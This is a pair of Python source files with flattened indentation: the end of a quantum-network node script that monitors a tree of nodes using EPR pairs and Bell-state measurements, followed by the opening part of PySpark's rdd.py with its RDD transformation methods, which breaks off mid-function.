self.regVGlobal = bitarray(d)
# Dictionary for node identifiers
self.identifiers = {'parent':'unknown', 'leftChild':'unknown', 'rightChild':'unknown'}
self.state = {}
# If the node is different from the root node, it calculates the parent node id
if (myid != 0):
idp = 0
if (myid%2 == 0):
idp = int((myid - 2)/2)
elif (myid%2 == 1):
idp = int((myid - 1)/2)
# sets the identifier of the parent node
self.identifiers['parent'] = 'node'+str(idp)
# sets the parent node in the READY state
self.state[self.identifiers['parent']] = 'READY'
else:
self.identifiers['parent'] = 'null'
# Sets the name of the two child nodes
self.identifiers['leftChild'] = 'node'+str(myid*2+1)
self.identifiers['rightChild'] = 'node'+str(myid*2+2)
# List of indexes for the parent node and the two child nodes
self.indexes[self.identifiers['parent']] = []
self.indexes[self.identifiers['leftChild']] = []
self.indexes[self.identifiers['rightChild']] = []
# Sets the two child nodes in the READY state
self.state = {}
self.state[self.identifiers['leftChild']] = 'READY'
self.state[self.identifiers['rightChild']] = 'READY'
# Creates qubit registers for EPR pairs shared with child nodes
self.regA = {}
self.regA[self.identifiers['leftChild']] = [] # for the qubits that the node shares (entangled) with his left child
self.regA[self.identifiers['rightChild']] = [] # for the qubits that the node shares (entangled) with his right child
self.regAB = {}
self.regAB[self.identifiers['leftChild']] = [] # for the qubits that arrive from the left child
self.regAB[self.identifiers['rightChild']] = [] # for the qubits that arrive from the right child
# Creates qubit registers for EPR pairs shared with the parent node
self.regB = {}
self.regBA = {}
self.regB[self.identifiers['parent']] = []
self.regBA[self.identifiers['parent']] = []
# Initialize the CQC connection
with CQCConnection(self.myself) as self.node:
# If the node is not the root node (node0), it starts a local processing thread
if (myid != 0):
self.startLocalProcessing()
# Start del listening loop
self.listen()
###################################
#
# method for starting the local processing loop in a separate thread
#
def startLocalProcessing(self):
tProc = Thread(target=self.localProcessing, args=())
tProc.start()
###################################
#
# processing loop
#
def localProcessing(self):
# Initialize to 0 the bit register for the local state
i = 0
while i < self.d:
self.regVLocal[i] = 0
i = i+1
# Waits to execute STEP1 with the parent node
waitLoop = True
while waitLoop:
if (self.startStep1AsParent):
waitLoop = False
# If it has child nodes, send a classic message to the left child node to tell it to start STEP1
if (self.myid*2+2 < self.n):
self.state[self.identifiers['leftChild']] = 'STEP1'
parentStep1(self.node, self.identifiers['leftChild'], self.regA, self.regAB, self.d)
self.state[self.identifiers['leftChild']] = 'WAIT'
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":start_step1"))
# Waits until STEP1 finishes with the left child node
waitLoop = True
while waitLoop:
if (self.step1rightChild):
waitLoop = False
# STEP1 starts with the right child node
self.state[self.identifiers['rightChild']] = 'STEP1'
parentStep1(self.node, self.identifiers['rightChild'], self.regA, self.regAB, self.d)
self.state[self.identifiers['rightChild']] = 'WAIT'
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":start_step1"))
# Waits until STEP1 finishes with the right child node
waitLoop = True
while waitLoop:
if (self.numChildAnsw == 2):
waitLoop = False
self.numChildAnsw = 0
# Notifies the two child nodes that STEP1 has been terminated with both
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":step1_terminated"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":step1_terminated"))
# Main loop
while True:
to_print = "## [localProcessing] Child {}: current state is {}".format(self.node.name, self.state[self.identifiers['parent']])
print(to_print)
# If the parent node is in the PROC state, sleep by a random value, double-check that it is still in the PROC state
# and finally randomly changes some bits of the local state register
if (self.state[self.identifiers['parent']] == 'PROC'):
if (self.pendingViolation == 0):
wt = random()*60
time.sleep(wt)
else:
time.sleep(3)
if (self.state[self.identifiers['parent']] == 'PROC'): # re-check
# Check if there is a previous local violation not yet notified
# If there are none, it normally proceeds, otherwise it manages that pendant
if (self.pendingViolation == 0):
# Scrolls every bit of the register and changes it only if the random value is less than the value of p
i = 0
flag = 0
while i < self.d:
r = random()
if r < self.p:
if self.regVLocal[i] == 1:
self.regVLocal[i] = 0
elif self.regVLocal[i] == 0:
self.regVLocal[i] = 1
flag = 1
i = i+1
# If at least one bit has changed it means that there has been a local violation
if flag == 1:
# Check if can notify the local violation
if (self.notifyFlag):
# Notifies the two child nodes (if they exist) to pause communication with the parent node
if (self.myid*2+2 < self.n):
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":pause"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":pause"))
to_print = "## PROC ## Child {}: new local state after local violation: {}".format(self.node.name, self.regVLocal)
print(to_print)
# Notifies the parent node of the local violation by sending it a classic message
self.node.sendClassical(self.identifiers['parent'], str.encode(self.myself+":child_violation"))
# Updates the Bell pair and sends the modified qubits to the parent node starting the protocol STEP2
self.state[self.identifiers['parent']] = 'STEP2'
del self.indexes[self.identifiers['parent']][:] # perform some cleaning
childStep2(self.node, self.identifiers['parent'], self.regVLocal, self.regB, self.regBA, self.d, self.indexes[self.identifiers['parent']])
else:
self.pendingViolation = 1
to_print = "## PROC ## Child {}: local violation occurred but cannot notify now: {}".format(self.node.name, self.regVLocal)
print(to_print)
else:
# Manages the pending local violation
# Checks if can notify the local violation
if (self.notifyFlag):
# Notifies the two child nodes (if they exist) to pause communication with the parent node
if (self.myid*2+2 < self.n):
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":pause"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":pause"))
to_print = "## PROC ## Child {}: handling the pending local violation occurred before: {}".format(self.node.name, self.regVLocal)
print(to_print)
# Notifies the parent node of the local violation by sending it a classic message
self.node.sendClassical(self.identifiers['parent'], str.encode(self.myself+":child_violation"))
# Updates the Bell pair and sends the modified qubits to the parent node starting the protocol STEP2
self.state[self.identifiers['parent']] = 'STEP2'
del self.indexes[self.identifiers['parent']][:] # perform some cleaning
childStep2(self.node, self.identifiers['parent'], self.regVLocal, self.regB, self.regBA, self.d, self.indexes[self.identifiers['parent']])
# If the node status is not in PROC, wait until it returns in that state
elif (self.state[self.identifiers['parent']] != 'PROC'):
wt = 10
time.sleep(wt)
##############################################
#
# listening loop (starting message handling in a separate thread)
#
def listen(self):
# Initialize to 0 the bit register for the global state
i = 0
while i < self.d:
self.regVGlobal[i] = 0
i = i+1
# STEP1 management only for the root node
if (self.myid == 0):
# Left child node
self.state[self.identifiers['leftChild']] = 'STEP1'
parentStep1(self.node, self.identifiers['leftChild'], self.regA, self.regAB, self.d)
self.state[self.identifiers['leftChild']] = 'WAIT'
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":start_step1"))
data = self.node.recvClassical()
content = data.decode().split(":")
sender = content[0]
msg = content[1]
to_print = "App {}: received message '{}' from: {}".format(self.node.name, msg, sender)
print(to_print)
# Right child node
self.state[self.identifiers['rightChild']] = 'STEP1'
parentStep1(self.node, self.identifiers['rightChild'], self.regA, self.regAB, self.d)
self.state[self.identifiers['rightChild']] = 'WAIT'
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":start_step1"))
# Waits to receive the response from the right child node
data = self.node.recvClassical()
content = data.decode().split(":")
sender = content[0]
msg = content[1]
to_print = "App {}: received message '{}' from: {}".format(self.node.name, msg, sender)
print(to_print)
# Notifies both child nodes that STEP1 is terminated
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":step1_terminated"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":step1_terminated"))
# Waits to receive a classic message, after which it handles it in a dedicated thread
while True:
data = self.node.recvClassical()
content = data.decode().split(":")
sender = content[0]
msg = content[1]
to_print = "App {}: received message '{}' from: {}".format(self.node.name, msg, sender)
print(to_print)
# Checks the type of the received message
if (msg == "start_step1"):
self.state[self.identifiers['parent']] = 'STEP1'
tComm = Thread(target=self.commHandler, args=(sender, self.regB, self.regBA))
tComm.start()
elif (msg == "end_step1"):
self.step1rightChild = 1
self.numChildAnsw += 1
elif (msg == "step1_terminated"):
self.step1Terminated = 1
elif (msg == "pause"):
self.notifyFlag = 0
elif (msg == "restart"):
self.notifyFlag = 1
elif (msg == "child_violation"):
# When it receives a violation notification from a child node, the parent node communicates
# to its parent node that is engaged in the protocol with its children and starts it
self.notifyFlag = 0 # the parent node suspends the communication of a possible local violation
if (self.myid != 0): # check that the parent node is not the root
self.node.sendClassical(self.identifiers['parent'], str.encode(self.myself+":start_busy"))
tComm = Thread(target=self.commHandler, args=(sender, self.regA, self.regAB))
tComm.start()
elif (msg == "start_busy"):
# If he receives a busy message from a child node, he tells his other child node that
# he can not momentarily serve him in case he suffers a local violation
otherChild = 'temp'
if (sender == self.identifiers['leftChild']):
otherChild = self.identifiers['rightChild']
else:
otherChild = self.identifiers['leftChild']
self.node.sendClassical(otherChild, str.encode(self.myself+":pause"))
elif (msg == "end_busy"):
otherChild = 'temp'
if (sender == self.identifiers['leftChild']):
otherChild = self.identifiers['rightChild']
else:
otherChild = self.identifiers['leftChild']
self.node.sendClassical(otherChild, str.encode(self.myself+":restart"))
else:
# Starts a new thread to handle the communication, if the message was sent
# from the parent node it passes the regB registers and regBA, otherwise regA and regAB
if (sender == self.identifiers['parent']):
tComm = Thread(target=self.commHandler, args=(sender, self.regB, self.regBA))
else:
tComm = Thread(target=self.commHandler, args=(sender, self.regA, self.regAB))
tComm.start()
###################################
#
# handler for messages coming from any node
#
def commHandler(self, sender, reg1, reg2):
#to_print = "commHandler - message sender is: {}".format(sender)
#print(to_print)
# Actions of the child node
if (sender == self.identifiers['parent']):
if (self.state[sender] == 'STEP1'):
childStep1(self.node, self.identifiers['parent'], reg1, reg2, self.d)
self.node.sendClassical(self.identifiers['parent'], str.encode(self.myself+":end_step1"))
# Waits for the parent node to know that it has finished STEP1 with all its child nodes
waitLoop = True
while waitLoop:
if (self.step1Terminated):
waitLoop = False
self.startStep1AsParent = 1
self.state[sender] = 'PROC'
elif (self.state[sender] == 'PROC'):
self.state[sender] = 'WAIT'
to_print = "#### Child {}: forced to {} by {}".format(self.node.name, self.state[sender], sender)
print(to_print)
# Communicate to its two child nodes (if they exist) that it is busy synchronizing with its parent node
if (self.myid*2+2 < self.n):
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":pause"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":pause"))
elif (self.state[sender] == 'WAIT'):
# Update the Bell pairs and send changed qubits to parent
self.state[sender] = 'STEP2'
del self.indexes[self.identifiers['parent']][:] # perform some cleaning
childStep2(self.node, self.identifiers['parent'], self.regVLocal, self.regB, self.regBA, self.d, self.indexes[self.identifiers['parent']])
elif (self.state[sender] == 'STEP2'):
self.state[sender] = 'STEP3'
childStep3(self.node, sender, reg1, reg2, self.d, self.indexes[self.identifiers['parent']])
self.state[sender] = 'STEP4'
childStep4(self.node, sender, self.regVGlobal, reg1, reg2, self.d)
elif (self.state[sender] == 'STEP4'):
to_print = "#### Child {}: end protocol notified by {}".format(self.node.name, sender)
print(to_print)
# Communicates to its two child nodes (if they exist) that can resume communication with the parent node
if (self.myid*2+2 < self.n):
self.node.sendClassical(self.identifiers['leftChild'], str.encode(self.myself+":restart"))
self.node.sendClassical(self.identifiers['rightChild'], str.encode(self.myself+":restart"))
self.state[sender] = 'PROC'
# Actions of the parent node
else:
# Establishes who is the brother node of the one who sent a message to the parent node
otherChild = 'temp'
if (sender == self.identifiers['leftChild']):
otherChild = self.identifiers['rightChild']
else:
otherChild = self.identifiers['leftChild']
if (self.state[sender] == 'WAIT'):
# Sends a classic message to the other child node to force it into the WAIT state (assuming it is in the PROC state)
self.node.sendClassical(otherChild, str.encode(self.myself+":wait"))
# Starts the parentStep2 with the child node that has notified a local violation
self.state[sender] = 'STEP2'
del self.indexes[sender][:] # perform some cleaning
parentStep2(self.node, sender, reg2, self.d, self.indexes[sender])
# Sends a classic message to the other child node to force it into the STEP2 state (assuming it is in the WAIT state)
self.node.sendClassical(otherChild, str.encode(self.myself+":step2"))
# Starts the parentStep2 with the other child node
self.state[otherChild] = 'STEP2'
del self.indexes[otherChild][:] # perform some cleaning
parentStep2(self.node, otherChild, reg2, self.d, self.indexes[otherChild])
# Updates the global registry
time.sleep(2)
to_print = "## 3 ## Parent {}: updating regVGlobal".format(self.node.name)
print(to_print)
# Perform Bell state discrimination by nondestructive measurement
# on the local Bell pairs (whose indexes have been saved)
print("Indexes size: {}".format(len(self.indexes[sender])))
regSender = bitarray(self.d)
regOtherChild = bitarray(self.d)
i = 0
while i < (self.d)/2:
# Measures the qubits of the child node that had the local violation
aq1_sender = qubit(self.node)
aq2_sender = qubit(self.node)
nondestructiveBellStateDiscrimination(reg1[sender][i], reg2[sender][i], aq1_sender, aq2_sender)
b1_sender = aq1_sender.measure()
b2_sender = aq2_sender.measure()
regSender[i*2] = b1_sender
regSender[i*2+1] = b2_sender
# Measures the qubits of the other child node
aq1_otherChild = qubit(self.node)
aq2_otherChild = qubit(self.node)
nondestructiveBellStateDiscrimination(reg1[otherChild][i], reg2[otherChild][i], aq1_otherChild, aq2_otherChild)
b1_otherChild = aq1_otherChild.measure()
b2_otherChild = aq2_otherChild.measure()
regOtherChild[i*2] = b1_otherChild
regOtherChild[i*2+1] = b2_otherChild
to_print = "App {}: nbsd of {} --> i, b1, b2: {}, {}, {}".format(self.node.name,sender,i,b1_sender,b2_sender)
print(to_print)
to_print = "App {}: nbsd of {} --> i, b1, b2: {}, {}, {}".format(self.node.name,otherChild,i,b1_otherChild,b2_otherChild)
print(to_print)
i = i+1
# Calculates the new global state from the average of the local states of the two child nodes
avgIntLocalStates = int((int(regSender.to01(),2) + int(regOtherChild.to01(),2))/2)
avgBitLocalStates = bin(avgIntLocalStates)[2:].zfill(self.d)
avgBitLocalStatesList = [int(i) for i in str(avgBitLocalStates)]
i = 0
while i < self.d:
self.regVGlobal[i] = avgBitLocalStatesList[i];
i = i+1
# Print the new v(t)
print("New Global State: {}".format(self.regVGlobal))
time.sleep(3)
# Starts parentStep3 and parentStep4 with each child node (first one, then the other)
# Current child node
self.state[sender] = 'STEP3'
self.node.sendClassical(sender, str.encode(self.myself+":step3")) # wake up sender to STEP3
parentStep3(self.node, sender, self.regVGlobal, reg1, reg2, self.d, self.indexes[sender])
self.state[sender] = 'STEP4'
parentStep4(self.node, sender, reg1, reg2, self.d)
self.state[sender] = 'WAIT'
time.sleep(2)
# Other child node
self.state[otherChild] = 'STEP3'
self.node.sendClassical(otherChild, str.encode(self.myself+":step3")) # wake up other child to STEP3
parentStep3(self.node, otherChild, self.regVGlobal, reg1, reg2, self.d, self.indexes[otherChild])
self.state[otherChild] = 'STEP4'
parentStep4(self.node, otherChild, reg1, reg2, self.d)
self.state[otherChild] = 'WAIT'
# Notifies the end of the protocol to the child nodes and to the parent node
self.node.sendClassical(sender, str.encode(self.node.name+":protocol_terminated"))
self.node.sendClassical(otherChild, str.encode(self.node.name+":protocol_terminated"))
# If it is not the root node (node0) it tells its parent node that it is no longer engaged
if (self.myself != "node0"):
self.node.sendClassical(self.identifiers['parent'], str.encode(self.node.name+":end_busy"))
self.notifyFlag = 1
##############################
#
# main
#
def main():
print('Number of arguments:', len(sys.argv), 'arguments.')
print('Argument List:', str(sys.argv))
# Node id
myid = int(sys.argv[1])
# Probability of local violation
p = round(float(sys.argv[2]),1)
# d value
d = 4
# Number of nodes
n = 7
qgmnode = QGMNode(myid, d, p, n)
print(qgmnode.identifiers)
##############################
main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
__all__ = ["RDD"]
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
# The RDD materialization time is unpredicable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sock.makefile("rb", 65536))
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
